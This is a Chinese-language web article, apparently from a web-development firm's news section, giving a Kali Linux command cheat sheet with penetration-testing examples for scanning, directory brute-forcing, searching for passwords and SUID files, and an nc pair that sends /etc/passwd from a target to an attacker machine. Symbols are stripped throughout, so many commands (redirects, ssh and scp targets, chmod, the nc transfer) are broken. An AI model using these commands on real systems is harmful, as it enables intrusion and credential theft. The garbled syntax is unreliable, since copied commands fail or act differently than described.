ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

Kali常用命令

Kali常用命令 Kali Linux 核心命令分类速查表类别命令功能描述常用参数/示例系统信息uname -a查看系统内核与版本信息uname -r(仅内核版本)whoami显示当前登录用户名hostname显示主机名hostname -I(显示所有IP地址)ifconfig/ip addr查看网络接口信息netstat显示网络连接、路由表、接口统计等netstat -tulnp(查看监听端口)ps显示当前进程状态ps aux(查看所有进程)文件与目录pwd显示当前工作目录路径ls列出目录内容ls -la(详细列表含隐藏文件)cd切换目录cd ..(上级目录)mkdir创建目录mkdir -p dir1/dir2(递归创建)rm删除文件或目录rm -rf dir_name(强制递归删除)cp复制文件或目录cp -r source_dir target_dir(递归复制目录)mv移动或重命名文件/目录mv old_name new_namecat查看、连接文件内容cat file1 file2 combinedmore/less分页查看文件内容less /var/log/sysloghead/tail查看文件头部/尾部内容tail -f /var/log/auth.log(实时追踪)find查找文件或目录find / -name *.conf2/dev/nullgrep文本搜索工具grep -r password /etc/ 2/dev/nulllocate快速查找文件需先更新数据库sudo updatedb然后locate nginx.conf权限管理chmod修改文件权限chmod 755 script.sh或chmod x script.shchown修改文件所有者和所属组sudo chown user:group filesudo以超级用户权限执行命令sudo apt update包管理apt update更新软件包列表apt upgrade升级所有可升级的软件包apt install package安装软件包apt install nmapapt remove package卸载软件包保留配置apt purge package彻底卸载软件包含配置网络操作ping测试网络连通性ping -c 4 8.8.8.8nslookup/dig域名解析查询dig example.comwget/curl从网络下载文件或测试HTTP服务wget http://example.com/filecurl -I http://example.comssh安全远程登录ssh user192.168.1.1scp安全远程复制文件scp file.txt userhost:/path/netcat (nc)网络界的“瑞士军刀”读写TCP/UDP连接nc -lvnp 4444(监听端口)nc 192.168.1.100 80(连接端口)信息收集nmap网络发现与安全审计nmap -sVsC 192.168.1.0/24(服务和脚本扫描)nmap -p192.168.1.100(全端口扫描)arp-scan局域网主机发现sudo arp-scan --localnetniktoWeb服务器漏洞扫描nikto -h http://target.comdirb/gobusterWeb目录爆破gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt漏洞利用与后渗透msfconsoleMetasploit框架主控制台启动后使用search、use、set、exploit等命令searchsploit搜索Exploit-DB漏洞库searchsploit apache 2.4python3 -m http.server快速启动一个HTTP服务器常用于传输文件到目标机which/whereis查找命令位置which nmaphistory查看命令历史记录history | grep ssh渗透测试常用命令组合示例1. 信息收集与扫描# 综合扫描操作系统识别、服务版本探测、默认脚本扫描 sudo nmap -OsV -sC -T4 192.168.1.100# 快速发现存活主机 sudo nmap -sn 192.168.1.0/24 # 枚举SMB共享信息 enum4linux -a 192.168.1.1002. 文件操作与查找# 在当前目录及子目录中查找包含“password”的配置文件 grep -r -i password /etc/ --include*.conf 2/dev/null # 查找具有SUID权限的可执行文件可能用于权限提升 find / -perm -us -type f 2/dev/null3. 网络监听与文件传输# 在攻击机上监听端口准备接收文件 nc -lvnp 4444 received_file# 在目标机上发送文件到攻击机 nc 192.168.1.50 4444 /etc/passwd4. 权限提升初步检查# 检查当前用户的sudo权限 sudo -l # 检查内核版本搜索已知漏洞uname -a searchsploit linux kernel $(uname -r)重要提示以上所有命令尤其是涉及网络扫描、漏洞利用的部分必须在获得明确授权的环境中进行测试和使用严禁用于任何非法目的 。参考来源收藏Kali Linux 超全基础命令大全Kali Linux 基础命令大全20 个高频操作渗透测试新手记熟就能用全网最新最全kali Linux基本命令大全零基础入门到精通看这一篇就够了网安新人必看全网最强的Kali Linux命令大全从零基础到精通收藏这篇就够了网安新人必看全网最强的Kali Linux命令大全从零基础到精通收藏这篇就够了
返回列表